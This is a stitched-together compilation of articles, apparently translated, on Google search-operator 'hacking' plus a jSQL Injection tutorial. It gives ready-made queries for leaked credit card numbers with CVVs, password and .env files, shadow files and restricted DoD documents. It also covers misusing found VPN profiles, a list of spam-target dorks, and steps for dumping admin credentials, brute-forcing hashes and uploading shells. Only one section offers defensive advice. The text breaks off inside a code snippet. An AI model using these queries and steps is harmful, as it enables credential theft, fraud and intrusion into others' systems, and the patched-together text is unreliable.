Using Google's little-known features to find hidden data, and using Google as a CGI scanner

Obtaining private data does not always require hacking: sometimes it is published in open access. Knowledge of Google's settings and a little ingenuity will turn up a lot of interesting things, from credit card numbers to FBI documents.

WARNING

All information is provided for informational purposes only. Neither the editors nor the author are responsible for any possible harm caused by the materials of this article.

Today everything is connected to the Internet, with little concern for restricting access. As a result, a lot of private data becomes prey for search engines. Spider robots are no longer limited to web pages; they index all content available on the Web and constantly add confidential information to their databases. Learning these secrets is easy: you just need to know how to ask.

Looking for files

In capable hands, Google will quickly find everything that is poorly guarded on the Web, from personal information to files meant for internal use. Such files are often hidden like a key under a doormat: there are no real access restrictions, the data simply sits in an out-of-the-way corner of the site that no links point to. Google's standard web interface provides only basic advanced-search settings, but even those will suffice.

There are two operators for restricting a Google search to files of a certain type: filetype and ext. The first sets the format that the search engine determined from the file header; the second sets the file extension, regardless of the file's actual contents. In both cases you specify only the extension. Originally the ext operator was convenient when a file had no distinctive format features (for example, when searching for ini and cfg configuration files, which can contain anything). Google's algorithms have since changed, and there is no visible difference between the two operators: the results are the same in most cases.


Filtering the output

By default, Google searches for the entered words (and, in general, any entered characters) across all files on indexed pages. You can limit the search scope to a top-level domain or a specific site, or restrict it by where the desired sequence occurs within the files themselves. For the first two options, use the site operator followed by the domain name or the chosen site. For the third, a whole set of operators lets you search service fields and metadata: allinurl finds the words inside the links themselves, allinanchor inside anchor text (the text of <a> tags), allintitle in page titles, and allintext in page bodies.

Each of these operators has a lighter version with a shorter name (without the all prefix). The difference is that allinurl finds links containing all the query words, while inurl requires only the first of them; the second and subsequent words may appear anywhere on the page. The inurl operator also differs from the similar site operator: inurl can match any sequence of characters within the link to a document (for example, /cgi-bin/), which is widely used to find components with known vulnerabilities.

Let's try it in practice. Using the allintext filter, we make the query return a list of credit card numbers and verification codes that will expire only in two years (or when their owners get tired of feeding everyone who asks).

allintext: card number expiration date /2017 cvv

When you read in the news that a young hacker has "hacked the servers" of the Pentagon or NASA and stolen classified information, in most cases exactly this elementary Google technique was used. Suppose we are interested in a list of NASA employees and their contact details. Such a list surely exists in electronic form, and, whether for convenience or through oversight, it may sit on the organization's own website. Logically, there will be no links to it, since it is intended for internal use. What words might such a file contain? At the very least, the field "address". Testing all these assumptions is easy.


inurl:nasa.gov filetype:xlsx "address"


We use bureaucracy

Such finds are a pleasant trifle. A really solid catch requires a more detailed knowledge of Google's search operators, the Web itself, and the structure of what you are looking for. Knowing the details, you can easily filter the output and refine the properties of the files you need, so that what remains is truly valuable data. It is funny that bureaucracy comes to the rescue here: it produces standardized wording that makes it convenient to search for secret information that has accidentally leaked onto the Web.

For example, the Distribution statement stamp, mandatory in the paperwork of the US Department of Defense, denotes standardized restrictions on a document's distribution. The letter A marks public releases containing nothing secret; B means internal use only; C means strictly confidential; and so on up to F. The letter X stands apart, marking especially valuable information that constitutes a state secret of the highest level. Let those whose job it is search for such documents; we will limit ourselves to files marked with the letter C. According to DoDI 5230.24, this marking is assigned to documents describing critical technologies that fall under export control. Such carefully guarded information can be found on sites in the .mil top-level domain, allocated to the US military.

"DISTRIBUTION STATEMENT C" inurl:navy.mil

It is very convenient that the .mil domain contains only sites of the US Department of Defense and its contractors. Search results limited to this domain are exceptionally clean, and the titles speak for themselves. Searching for Russian secrets this way is practically useless: chaos reigns in the .ru and .rf domains, and the names of many weapons systems sound botanical (the PP "Kiparis", the "Acacia" self-propelled gun) or even fairy-tale (the TOS "Pinocchio").


By carefully examining any document from a .mil site, you can spot other markers to refine your search. For example, the reference to the export restrictions "Sec 2751" is also convenient for finding interesting technical information. Such documents are periodically removed from the official sites where they once appeared, so if you cannot follow an interesting link in the search results, use Google's cache (the cache operator) or the Internet Archive.

We climb into the clouds

Besides accidentally declassified documents from government agencies, Google's cache occasionally turns up links to private files from Dropbox and other storage services that create "private" links to publicly accessible data. It is even worse with alternative and home-grown services. For example, the following query finds data belonging to all Verizon customers who have an FTP server set up and actively in use on their router.

allinurl:ftp://verizon.net

There are now more than forty thousand such people, and in the spring of 2015 there were an order of magnitude more. Instead of verizon.net you can substitute the name of any well-known provider, and the more famous it is, the bigger the catch can be. Through the router's built-in FTP server you can see files on any external drive connected to it. Usually that is a NAS for remote work, a personal cloud, or some peer-to-peer downloading setup. All the contents of such media get indexed by Google and other search engines, so files on external drives can be reached by a direct link.

Peeping configs

Before the wholesale migration to the clouds, simple FTP servers, which had their own share of vulnerabilities, ruled as remote storage. Many of them are still in use today. For example, the popular WS_FTP Professional program stores configuration data, user accounts, and passwords in the ws_ftp.ini file. It is easy to find and read, since all entries are stored in plain text, and passwords are encrypted with the Triple DES algorithm after minimal obfuscation. In most versions, simply discarding the first byte is sufficient.

Decrypting such passwords is easy using the WS_FTP Password Decryptor utility or a free web service.

When people talk about hacking an arbitrary site, they usually mean obtaining a password from logs and backups of CMS or e-commerce application configuration files. If you know their typical structure, it is easy to pick out the keywords. Lines like those found in ws_ftp.ini are extremely common. For example, Drupal and PrestaShop always have a user identifier (UID) and a corresponding password (pwd), and all this information is stored in files with the .inc extension. You can search for them like this:

"pwd=" "UID=" ext:inc

We reveal passwords from the DBMS

In the configuration files of SQL servers, user names and email addresses are stored in clear text, with MD5 hashes written in place of the passwords. Strictly speaking, reversing a hash is impossible, but you can look for a match among known hash-password pairs.
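Matching a leaked hash against known pairs is easy to sketch. A minimal Python example, with a hypothetical hash and a tiny stand-in wordlist (a real attack would use a large dictionary or a precomputed hash database):

```python
import hashlib

# A hypothetical leaked MD5 hash: this one is md5("qwerty").
leaked = "d8578edf8458ce06fbc5bb76a58c5ca4"

# Tiny stand-in for a real wordlist or hash-pair database.
wordlist = ["123456", "password", "qwerty", "letmein"]

for candidate in wordlist:
    # Hash each candidate and compare with the leaked value.
    if hashlib.md5(candidate.encode()).hexdigest() == leaked:
        print("match:", candidate)  # prints: match: qwerty
        break
```

This is exactly why online "MD5 decryption" services work: they simply keep enormous tables of precomputed hash-password pairs.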

To this day there are DBMSs that do not even hash passwords. The configuration files of any of them can simply be viewed in a browser.

intext:DB_PASSWORD filetype:env

With the advent of Windows servers, the registry partly took over the role of configuration files. You can search its branches in exactly the same way, using reg as the file type. For example:

filetype:reg HKEY_CURRENT_USER "Password"=

Don't Forget the Obvious

Sometimes classified information can be reached through data that was accidentally exposed and picked up by Google. The ideal case is finding a list of passwords in some common format. Only desperate people store account information in a text file, a Word document, or an Excel spreadsheet, but there are always enough of them.

filetype:xls inurl:password

On the one hand, there are plenty of means to prevent such incidents: set adequate access rights in htaccess, patch the CMS, avoid dubious third-party scripts, and close other holes. There is also the robots.txt exclusion file, which forbids search engines to index the files and directories listed in it. On the other hand, if the robots.txt structure on some server differs from the standard one, it immediately becomes clear what they are trying to hide there.
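A hypothetical robots.txt illustrates the paradox: the very entries meant to keep crawlers out also tell a human reader exactly where to look (the paths here are made up for illustration):

```
User-agent: *
Disallow: /admin/
Disallow: /backup/
Disallow: /personal/
```

The file is always fetched from the site root and is readable by anyone, so it should never be treated as an access-control mechanism.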

The list of directories and files on a site is preceded by the standard heading "index of". Since it must appear in the title for service purposes, it makes sense to limit the search with the intitle operator. Interesting things can be found in the /admin/, /personal/, /etc/, and even /secret/ directories.

Follow the updates

Freshness matters a great deal here: old vulnerabilities get closed very slowly, while Google and its search results change constantly. There is even a difference between the "last second" filter (&tbs=qdr:s at the end of the request URL) and the "real time" filter (&tbs=qdr:1).

Google also indicates the date of a file's last update, if implicitly. Through the graphical web interface you can select one of the typical periods (hour, day, week, and so on) or set a date range, but this method is not suited to automation.

From the look of the address bar, one can only guess at the way to limit results using the &tbs=qdr: construct. The letter y after it sets a limit of one year (&tbs=qdr:y), m shows results for the last month, w for the week, d for the past day, h for the last hour, n for the last minute, and s for the last second. The very latest results, just made known to Google, are found with the &tbs=qdr:1 filter.
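For scripting, the same freshness codes can simply be appended to a hand-built search URL. A minimal sketch in Python (the query used is just an example; the parameter names are the q and tbs=qdr: constructs described above):

```python
from urllib.parse import urlencode

def google_url(query, period=None):
    """Build a Google search URL; period is one of the
    qdr codes described above: y, m, w, d, h, n, s."""
    params = {"q": query}
    if period:
        params["tbs"] = "qdr:" + period
    return "https://www.google.com/search?" + urlencode(params)

# Results for the past week:
print(google_url('intext:DB_PASSWORD filetype:env', period="w"))
```

urlencode takes care of escaping the colons and spaces, so the operators survive the trip through the URL intact.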

If you need to write a clever script, it is useful to know that Google accepts date ranges in Julian day format via the daterange operator. For example, this is how to find a list of PDF documents with the word confidential uploaded between January 1 and July 1, 2015.

Confidential filetype:pdf daterange:2457024-2457205

The range is specified as Julian day numbers without the decimal part. Translating them from the Gregorian calendar by hand is inconvenient; it is easier to use a date converter.
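Or automate the conversion. In Python, the standard library's proleptic Gregorian ordinal differs from the Julian day number by a constant offset, so a converter is a one-liner (a sketch; 1721425 is the offset that yields the integer, noon-based JDN):

```python
from datetime import date

def julian_day(d):
    # date.toordinal() counts days from 0001-01-01;
    # adding 1721425 gives the Julian day number.
    return d.toordinal() + 1721425

start = julian_day(date(2015, 1, 1))
end = julian_day(date(2015, 7, 1))
print("daterange:%d-%d" % (start, end))  # daterange:2457024-2457205
```

The output matches the range in the example query above.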

Targeting and filtering again

Besides specifying additional operators in the search query itself, they can be passed directly in the URL. For example, the filetype:pdf refinement corresponds to the as_filetype=pdf construct. This makes it convenient to set any clarifications. Say, results only from the Republic of Honduras are requested by adding cr=countryHN to the search URL, and results only from the city of Bobruisk by gcs=Bobruisk. A complete list of parameters can be found in the developer section.

Google's automation tools are meant to make life easier, but they often add hassle. For example, the user's city is determined from the user's IP via WHOIS. Based on this information, Google not only balances load between servers but also changes the search results. Depending on the region, different results will reach the first page for the same query, and some of them may be hidden entirely. The two-letter country code after the gl=country directive will let you feel like a cosmopolitan and search for information from any country. For example, the code for the Netherlands is NL, while the Vatican and North Korea have no code of their own in Google.

Often the search results remain cluttered even after several advanced filters. In that case it is easy to refine the query by adding a few exclusion words (each preceded by a minus sign). For example, banking, names, and tutorial often occur alongside the word Personal. Therefore a refined query, rather than a textbook one, will show cleaner results:

intitle:"Index of /Personal/" -names -tutorial -banking

Last Example

A sophisticated hacker is distinguished by providing for himself everything he needs. For example, a VPN is a handy thing, but it is either expensive or temporary and limited. Subscribing alone is too costly. Fortunately there are group subscriptions, and with Google it is easy to become part of a group. To do so, just find a Cisco VPN configuration file, which has the rather nonstandard PCF extension and a recognizable path: Program Files\Cisco Systems\VPN Client\Profiles. One request, and you join, say, the friendly staff of the University of Bonn.

filetype:pcf vpn OR Group

INFO

Google finds configuration files with passwords, but many of them are encrypted or replaced with hashes. If you see strings of a fixed length, look for a decryption service right away.

The passwords are stored in encrypted form, but Maurice Massard has already written a program to decrypt them and is providing it for free via thecampusgeeks.com.

Google is used to carry out hundreds of different types of attacks and penetration tests. There are many variants, targeting popular programs, major database formats, numerous PHP vulnerabilities, clouds, and so on. Knowing exactly what you are looking for greatly simplifies obtaining the information you need (especially information that was never meant to be public). Shodan is not the only source of interesting ideas: so is any database of indexed network resources!

How to search using google.com

Everyone probably knows how to use a search engine like Google =) But not everyone knows that if you compose a search query correctly, with the help of special constructs, you can reach what you are looking for much faster and more efficiently =) In this article I will try to show what to do, and how, in order to search correctly.

Google supports several advanced search operators that have special meaning when searching on google.com. Typically these operators modify the search, or even tell Google to perform a completely different type of search. For example, the construct link: is a special operator, and the query link:www.google.com will not run a normal search but will instead find all web pages that link to google.com.

Alternative query types

cache: Shows the cached copy of a page. If you include other words in the query, Google will highlight them within the cached document.
For example, cache:www.site web will show the cached content with the word "web" highlighted.

link: Shows web pages that contain links to the specified page.
For example, link:www.site will display all pages that have a link to http://www.site

related: Displays web pages that are "related" to the specified web page.
For example, related:www.google.com will list web pages similar to Google's home page.

info: Provides some of the information that Google has about the requested web page.
For example, info:site will show information about our forum =) (Armada - a forum for adult webmasters).

Other information requests

define: Provides a definition of the words you type after it, compiled from various online sources. The definition covers the entire phrase entered (that is, all the words in the exact query).

stocks: If you start a query with stocks:, Google treats the rest of the query terms as stock ticker symbols and links to a page showing ready-made information for those tickers.
For example, stocks:intel yahoo will show information about Intel and Yahoo. (Note that you must type the ticker symbols, not the company names.)

Request Modifiers

site: If you include site: in your query, Google limits the results to the websites it finds in that domain.
You can also search individual zones, such as ru, org, com, etc. (site:com, site:ru)

allintitle: If you run a query with allintitle:, Google limits the results to pages with all the query words in the title.
For example, allintitle:google search will return all of Google's search pages, such as Images, Blog, etc.

intitle: If you include intitle: in your query, Google restricts the results to documents containing that word in the title.
For example, intitle:Business

allinurl: If you run a query with allinurl:, Google limits the results to pages with all the query words in the URL.
For example, allinurl:google search will return documents with google and search in the URL. As an option, you can separate words with a slash (/); the words on either side of the slash will then be searched within the same page. Example: allinurl:foo/bar

inurl: If you include inurl: in your query, Google limits the results to documents containing that word in the URL.
For example, animation inurl:site

intext: Searches for the specified word only in the text of the page, ignoring the title, link text, and other unrelated parts. There is also a derivative of this modifier, allintext:, with which all the query words are searched only in the page text, likewise ignoring words that frequently occur in links.
For example, intext:forum

daterange: Searches within a time frame (daterange:2452389-2452389); the dates are specified in Julian day format.

And now, all sorts of interesting example queries

Examples of compiling queries for Google. For spammers

inurl:control.guest?a=sign

site:books.dreambook.com "Homepage URL" "Sign my" inurl:sign

site:www.freegb.net Homepage

inurl:sign.asp "Character Count"

"Message:" inurl:sign.cfm "Sender:"

inurl:register.php "User Registration" "Website"

inurl:edu/guestbook "Sign the Guestbook"

inurl:post "Post Comment" "URL"

inurl:/archives/ "Comments:" "Remember info?"

"Script and Guestbook Created by:" "URL:" "Comments:"

inurl:?action=add "phpBook" "URL"

intitle:"Submit New Story"

Journals

inurl:www.livejournal.com/users/mode=reply

inurl:greatestjournal.com/mode=reply

inurl:fastbb.ru/re.pl?

inurl:fastbb.ru/re.pl? "Guest book"

Blogs

inurl:blogger.com/comment.g? "postID" "anonymous"

inurl:typepad.com/ "Post a comment" "Remember personal info?"

inurl:greatestjournal.com/community/ "Post comment" "addresses of anonymous posters"

"Post comment" "addresses of anonymous posters"

intitle:"Post comment"

inurl:pirillo.com "Post comment"

Forums

inurl:gate.html? "name=Forums" "mode=reply"

inurl:"forum/posting.php?mode=reply"

inurl:"mes.php?"

inurl:"members.html"

inurl:"forum/memberlist.php?"

Hacking with Google

Alexander Antipov

The Google search engine (www.google.com) provides many search capabilities. All of them are an invaluable search tool for a first-time Internet user and, at the same time, an even more powerful weapon of invasion and destruction in the hands of people with evil intent, including not only hackers but also non-computer criminals and even terrorists.


Denis Batrankov
denisNOSPAMixi.ru

Attention: this article is not a guide to action. It is written for you, WEB server administrators, so that you lose the false feeling of being safe, finally understand the insidiousness of this method of obtaining information, and set about protecting your site.

Introduction

For example, I found 1670 pages in 0.14 seconds!

2. Let's enter another line, for example:

inurl:"auth_user_file.txt"

There are somewhat fewer results, but they are already enough for downloading the file and for password guessing (using the same John the Ripper). Below I will give a few more examples.

So, you need to realize that the Google search engine has visited most Internet sites and cached the information found on them. This cached information lets you learn about a site and its content without connecting to it directly, just by digging through what Google stores internally. Moreover, if information on a site is no longer available, the cached copy may still survive. All this method requires is knowing a few Google keywords. This technique is called Google Hacking.

Information about Google Hacking first appeared on the Bugtraq mailing list three years ago. In 2001 the topic was raised by a French student. Here is a link to the letter: http://www.cotse.com/mailing-lists/bugtraq/2001/Nov/0129.html . It gives the first examples of such queries:

1) Index of /admin
2) Index of /password
3) Index of /mail
4) Index of / +banques +filetype:xls (for france...)
5) Index of / +passwd
6) Index of/password.txt

This topic made a lot of noise in the English-speaking part of the Internet quite recently, after an article by Johnny Long published on May 7, 2004. For a fuller study of Google Hacking, I advise you to visit this author's site, http://johnny.ihackstuff.com. In this article I just want to bring you up to speed.

Who can use it:
- Journalists, spies and all those people who like to stick their nose in other people's business can use this to search for compromising evidence.
- Hackers looking for suitable targets for hacking.

How Google works.

To continue the conversation, let me remind you of some of the keywords used in Google queries.

Search using the + sign

Google excludes from the search words it considers unimportant, such as interrogatives, prepositions, and articles in English: for example are, of, where. In Russian, Google seems to consider all words important. If a word is excluded from the search, Google reports it. To make Google search for pages containing such words, add a + sign immediately before the word, with no space. For example:

ace +of base

Searching with the - sign

If Google finds a large number of pages and you want to exclude pages on certain topics, you can force Google to search only for pages that do not contain certain words. To do this, put a - sign immediately before each such word, with no space. For example:

fishing -vodka

Search with the ~ sign

You may want to find not only the specified word but also its synonyms. To do this, precede the word with the ~ symbol.

Finding an exact phrase using double quotes

Google searches each page for all occurrences of the words you wrote in the query string; it does not care about their relative position, as long as all the specified words appear on the page at once (this is the default behavior). To find an exact phrase, enclose it in quotation marks. For example:

"bookend"

To require at least one of the specified words, you must state the logical operation explicitly: OR. For example:

book safety OR protection

In addition, you can use the * sign in the search string to stand for any word, and . to stand for any character.

Finding words with additional operators

There are search operators that are specified in the search string in the format:

operator:search_term

No spaces are needed around the colon. If you insert a space after the colon, you will see an error message, while with a space before the colon Google treats the operator as an ordinary search string.
There are groups of additional search operators: languages (specify the language you want results in), date (limit results to the past three, six, or twelve months), occurrences (specify where in the document to look for the string: everywhere, in the title, in the URL), domains (search the specified site or, conversely, exclude it from the search), safe search (block sites containing the specified type of information and remove them from the results pages).
Some operators need no additional parameter, for example the query "cache:www.google.com" can be issued as a complete search string; others, on the contrary, require a search word, for example "site:www.google.com help". In light of our subject, let's look at the following operators:

Operator      Description                                                        Requires a parameter?

site:         search only the site specified in search_term                      yes
filetype:     search only documents of the type search_term                      yes
intitle:      find pages containing search_term in the title                     yes
allintitle:   find pages containing all the words search_term in the title       yes
inurl:        find pages containing search_term in their address                 yes
allinurl:     find pages containing all the words search_term in their address   yes

The site: operator limits the search to the specified site, and you can specify not only a domain name but also an IP address. For example, enter:

The filetype: operator restricts the search to files of a certain type. For example:

As of the date of this article, Google can search within 13 different file formats:

  • Adobe Portable Document Format (pdf)
  • Adobe PostScript (ps)
  • Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
  • Lotus Word Pro (lwp)
  • MacWrite (mw)
  • Microsoft Excel (xls)
  • Microsoft PowerPoint (ppt)
  • Microsoft Word (doc)
  • Microsoft Works (wks, wps, wdb)
  • Microsoft Write (wri)
  • Rich Text Format (rtf)
  • Shockwave Flash (swf)
  • Text (ans, txt)

The link: operator shows all pages that point to the specified page.
It is always interesting to see how many places on the Internet know about you. Let's try:

The cache: operator shows Google's cached version of a site as it looked the last time Google visited the page. Take any frequently changing site and look:

The intitle: operator searches for the specified word in the page title. The allintitle: operator is an extension: it searches for all of the specified words in the page title. Compare:

intitle:flight to mars
intitle:flight intitle:to intitle:mars
allintitle:flight to mars

The inurl: operator makes Google show all pages containing the specified string in the URL. allinurl: searches for all the words in the URL. For example:

allinurl:acid_stat_alerts.php

This command is especially useful for those who don't have SNORT - at least they can see how it works on a real system.

Google Hacking Methods

So, we found out that, using a combination of the above operators and keywords, anyone can collect the necessary information and search for vulnerabilities. These techniques are often referred to as Google Hacking.

Site Map

You can use the site: operator to see all the links Google has found on a site. Pages created dynamically by scripts are usually not indexed with their parameters, so some sites use ISAPI filters to turn links of the form /article.asp?num=10&dst=5 into /article/abc/num/10/dst/5, with slashes. This is done so that the site is indexed by search engines at all.

Let's try:

site:www.whitehouse.gov whitehouse

The assumption is that every page on the site contains the word whitehouse; that is what we use to get all the pages.
There is also a simplified version:

site:whitehouse.gov

And the best part is that the comrades at whitehouse.gov never even knew that we looked at the structure of their site and peeked into the cached pages that Google downloaded for itself. This can be used to study the structure of sites and view their content while remaining unnoticed for the time being.

Listing files in directories

WEB servers can show server directory listings instead of ordinary HTML pages. This is usually done so that users can select and download particular files. In many cases, however, the administrator has no intention of showing a directory's contents; it happens because of server misconfiguration or the absence of an index page in the directory. As a result, a hacker gets a chance to find something interesting in the directory and use it for his own purposes. To find all such pages, note that they all contain the words index of in their title. But since pages other than directory listings also contain these words, we need to refine the query using keywords that appear on the listing page itself, so queries like these will do:

intitle:index.of parent directory
intitle:index.of name size
Since most directory listings are intentional, you may have a hard time finding misplaced listings on the first try. But at the very least you can use the listings to determine the WEB server's version, as described below.

Getting the WEB server version.

Knowing the WEB server's version is always useful before starting any hacker attack. Again, thanks to Google, you can get this information without connecting to the server. If you look carefully at a directory listing, you will see that the WEB server's name and version are printed there.

Apache1.3.29 - ProXad Server at trf296.free.fr Port 80

An experienced administrator can change this information, but, as a rule, it is true. Thus, to get this information, it is enough to send a request:

intitle:index.of server.at

To get information for a specific server, we refine the request:

intitle:index.of server.at site:ibm.com

Or vice versa, we are looking for servers running on a specific version of the server:

intitle:index.of Apache/2.0.40 Server at

This technique can be used by a hacker to find a victim. If, for example, he has an exploit for a certain version of the WEB server, then he can find it and try the existing exploit.

You can also get the server version by looking at the pages that are installed by default when installing a fresh version of the WEB server. For example, to see the Apache 1.2.6 test page, just type

intitle:Test.Page.for.Apache it.worked!

Moreover, some operating systems install and start a WEB server during OS installation, and some users are not even aware of it. Naturally, if you see that someone has left the default page in place, it is logical to assume that the computer has not been configured at all and is probably vulnerable to attack.

Try looking for IIS 5.0 pages

allintitle:Welcome to Windows 2000 Internet Services

In the case of IIS, you can determine not only the server version but also the Windows version and service pack.

Another way to determine the web server version is to look for the manuals (help pages) and examples that may be installed on a site by default. Hackers have found quite a few ways to use these components to gain privileged access to a site, which is why they must be removed from a production site. Not to mention that their mere presence reveals the server type and version. For example, let's find the Apache manual:

inurl:manual apache directives modules

Using Google as a CGI scanner.

A CGI scanner (web scanner) is a utility for finding vulnerable scripts and programs on a victim's server. These utilities need to know what to look for, so they carry a whole list of vulnerable files, for example:

/cgi-bin/cgiemail/uargg.txt
/random_banner/index.cgi
/cgi-bin/mailview.cgi
/cgi-bin/maillist.cgi
/cgi-bin/userreg.cgi

/iissamples/ISSamples/SQLQHit.asp
/SiteServer/admin/findvserver.asp
/scripts/cphost.dll
/cgi-bin/finger.cgi

We can find each of these files with Google by combining index of or inurl with the file name in the search bar. This way we can find sites with vulnerable scripts, for example:

allinurl:/random_banner/index.cgi
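Building such queries from a file list is purely mechanical, which is what makes Google usable as a CGI scanner. The following sketch (illustrative only, not a real scanner) turns the article's sample paths into ready-made allinurl: queries:

```python
# Sketch: turn a list of known vulnerable paths into Google queries.
vulnerable_paths = [
    "/cgi-bin/cgiemail/uargg.txt",
    "/random_banner/index.cgi",
    "/cgi-bin/mailview.cgi",
    "/scripts/cphost.dll",
]

def make_dorks(paths):
    # One query per path; Google then returns sites exposing that file.
    return ["allinurl:" + path for path in paths]

for query in make_dorks(vulnerable_paths):
    print(query)
```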

With additional knowledge, a hacker could exploit a vulnerability in such a script and force it to serve any file stored on the server - a password file, for example.

How to protect yourself from being hacked through Google.

1. Do not upload important data to the WEB server.

Even if you post data temporarily, you can forget about it, or someone will have time to find and copy it before you erase it. Don't do it - there are many other ways to transfer data that protect it from theft.

2. Check your site.

Use the methods described here to examine your own site, and check it periodically for the new methods that appear on http://johnny.ihackstuff.com. Remember that if you want to automate your checks, you need special permission from Google. If you read http://www.google.com/terms_of_service.html carefully, you will see the phrase: "You may not send automated queries of any sort to Google's system without express permission in advance from Google."

3. You may not need Google to index your site or part of it.

Google allows you to remove a link to your site, or part of it, from its database, as well as remove pages from the cache. In addition, you can prohibit image search on your site and prohibit the display of short page fragments in search results. All the options for removing a site are described at http://www.google.com/remove.html. To use them, you must confirm that you are really the owner of the site or insert robots meta tags into the pages.

4. Use robots.txt

Search engines are known to read the robots.txt file at the root of the site and skip the parts marked with the word Disallow. You can use this to prevent part of the site from being indexed. Keep in mind that robots.txt is only a request: well-behaved crawlers honor it, but it is not access control. For example, to keep the entire site out of the index, create a robots.txt file containing two lines:

User-agent: *
Disallow: /

What else happens

Finally, so that life does not seem too sweet, I will say that there are sites that track people who use the methods above to look for holes in scripts and web servers. An example of such a page is

Appendix.

And now for dessert. Try some of the following queries yourself:

1. #mysql dump filetype:sql - search for MySQL database dumps
2. Host Vulnerability Summary Report - will show you what vulnerabilities other people have found
3. phpMyAdmin running on inurl:main.php - finds phpMyAdmin control panels left open to the world
4. Not for distribution confidential
5. Request Details Control Tree Server Variables
6. Running in child mode
7. This report was generated by WebLog
8. intitle:index.of cgiirc.config
9. filetype:conf inurl:firewall -intitle:cvs - maybe someone needs firewall configuration files? :)
10. intitle:index.of finances.xls - hmm....
11. intitle:Index of dbconvert.exe chats - icq chat logs
12. intext:Tobias Oetiker traffic analysis
13. intitle:Usage Statistics for Generated by Webalizer
14. intitle:statistics of advanced web statistics
15. intitle:index.of ws_ftp.ini - ws ftp config
16. inurl:ipsec.secrets holds shared secrets - secret key - good find
17. inurl:main.php Welcome to phpMyAdmin
18. inurl:server-info Apache Server Information
19. site:edu admin grades
20. ORA-00921: unexpected end of SQL command - get paths
21. intitle:index.of trillian.ini
22. intitle:Index of pwd.db
23. intitle:index.of people.lst
24. intitle:index.of master.passwd
25. inurl:passlist.txt
26. intitle:Index of .mysql_history
27. intitle:index of intext:globals.inc
28. intitle:index.of administrators.pwd
29. intitle:Index.of etc shadow
30. intitle:index.of secring.pgp
31. inurl:config.php dbuname dbpass
32. inurl:perform filetype:ini


    Run the downloaded file with a double click (a Java virtual machine must be installed).

    3. Anonymity when checking the site for SQL injections

    Setting up Tor and Privoxy in Kali Linux

    [Section under development]

    Setting up Tor and Privoxy on Windows

    [Section under development]

    jSQL Injection proxy settings

    [Section under development]

    4. Checking the site for SQL injection with jSQL Injection

    Working with the program is extremely simple. Just enter the site address and press ENTER.

    The following screenshot shows that the site is vulnerable to three types of SQL injections at once (information about them is indicated in the lower right corner). By clicking on the names of the injections, you can switch the method used:

    The existing databases are also displayed right away.

    You can see the contents of each table:

    Usually, the most interesting part of the tables is the administrator credentials.

    If you are lucky and found the administrator's credentials, it is too early to rejoice: you still need to find the admin panel where they can be entered.

    5. Search for admins with jSQL Injection

    To do this, go to the next tab. Here we are met by a list of possible addresses. You can select one or more pages to check:

    The convenience is that you do not need to use other programs.

    Unfortunately, careless programmers who store passwords in clear text are not very common. Quite often the password field contains something like

    8743b52063cd84097a65d1633f5c74f5

    This is a hash. It cannot be reversed directly, but the password can be recovered by brute force. And… jSQL Injection has a built-in brute-forcer.

    6. Brute-forcing hashes with jSQL Injection

    An undoubted convenience is that you do not need to look for other programs. Many of the most popular hash types are supported.

    This is not the best option. In order to become a guru in deciphering hashes, the book "" in Russian is recommended.

    But, of course, when there is no other program at hand or there is no time to study, jSQL Injection with a built-in brute-force function will come in handy.

    There are settings: you can set which characters are included in the password, the password length range.
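The built-in brute-forcer works on the same principle as this minimal sketch: walk a character set over a length range, hash every candidate, and compare. (MD5 and the deliberately weak 3-character password are assumptions chosen for the demonstration.)

```python
import hashlib
from itertools import product

def brute_force_md5(target_hash, charset="abcdefghijklmnopqrstuvwxyz", max_len=3):
    """Enumerate every candidate up to max_len characters and
    return the one whose MD5 digest matches target_hash."""
    for length in range(1, max_len + 1):
        for combo in product(charset, repeat=length):
            candidate = "".join(combo)
            if hashlib.md5(candidate.encode()).hexdigest() == target_hash:
                return candidate
    return None  # exhausted the keyspace without a match

# MD5 of the deliberately weak password "abc"
print(brute_force_md5("900150983cd24fb0d6963f7d28e17f72"))  # abc
```

Raising max_len or widening the charset makes the search exponentially slower, which is exactly why the length and character settings mentioned above matter.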

    7. File operations after SQL injection detection

    In addition to operations with databases - reading and modifying them, if SQL injections are detected, the following file operations can be performed:

    • reading files on the server
    • uploading new files to the server
    • uploading shells to the server

    And all this is implemented in jSQL Injection!

    There is a limitation: the SQL server must have file privileges. Reasonable system administrators disable them, so access to the file system cannot be obtained.

    The presence of file privileges is easy enough to check. Go to one of the tabs (reading files, creating a shell, uploading a new file) and try to perform one of the indicated operations.

    Another very important note: you need to know the exact absolute path to the file you will work with - otherwise nothing will work.

    Look at the following screenshot:

    Any attempt to operate on a file is answered with: No FILE privilege. And nothing can be done about it.

    If instead you have another error:

    Problem writing into [directory_name]

    This means that you incorrectly specified the absolute path where you want to write the file.

    To guess an absolute path, you must at least know the operating system the server is running on. To do this, switch to the Network tab.

    An entry like the following (the string Win64) gives us reason to assume that we are dealing with Windows:

    Keep-Alive: timeout=5, max=99
    Server: Apache/2.4.17 (Win64) PHP/7.0.0RC6
    Connection: Keep-Alive
    Method: HTTP/1.1 200 OK
    Content-Length: 353
    Date: Fri, 11 Dec 2015 11:48:31 GMT
    X-Powered-By: PHP/7.0.0RC6
    Content-Type: text/html; charset=UTF-8

    Here we have some Unix (*BSD, Linux):

    Transfer-Encoding: chunked
    Date: Fri, 11 Dec 2015 11:57:02 GMT
    Method: HTTP/1.1 200 OK
    Keep-Alive: timeout=3, max=100
    Connection: keep-alive
    Content-Type: text/html
    X-Powered-By: PHP/5.3.29
    Server: Apache/2.2.31 (Unix)

    And here we have CentOS:

    Method: HTTP/1.1 200 OK
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Set-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/
    Connection: keep-alive
    X-Cache-Lookup: MISS from t1.hoster.ru:6666
    Server: Apache/2.2.15 (CentOS)
    X-Powered-By: PHP/5.4.37
    X-Cache: MISS from t1.hoster.ru
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Date: Fri, 11 Dec 2015 12:08:54 GMT
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=WINDOWS-1251
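The Server strings in the headers above can be mapped to an OS guess mechanically. A rough sketch (the marker list is illustrative, not exhaustive):

```python
def guess_os(server_header):
    """Rough OS guess from an Apache Server header string."""
    markers = {
        "Win64": "Windows (64-bit)",
        "Win32": "Windows (32-bit)",
        "CentOS": "Linux (CentOS)",
        "Unix": "Unix-like (*BSD, Linux)",
    }
    for tag, os_name in markers.items():
        if tag in server_header:
            return os_name
    return "unknown"

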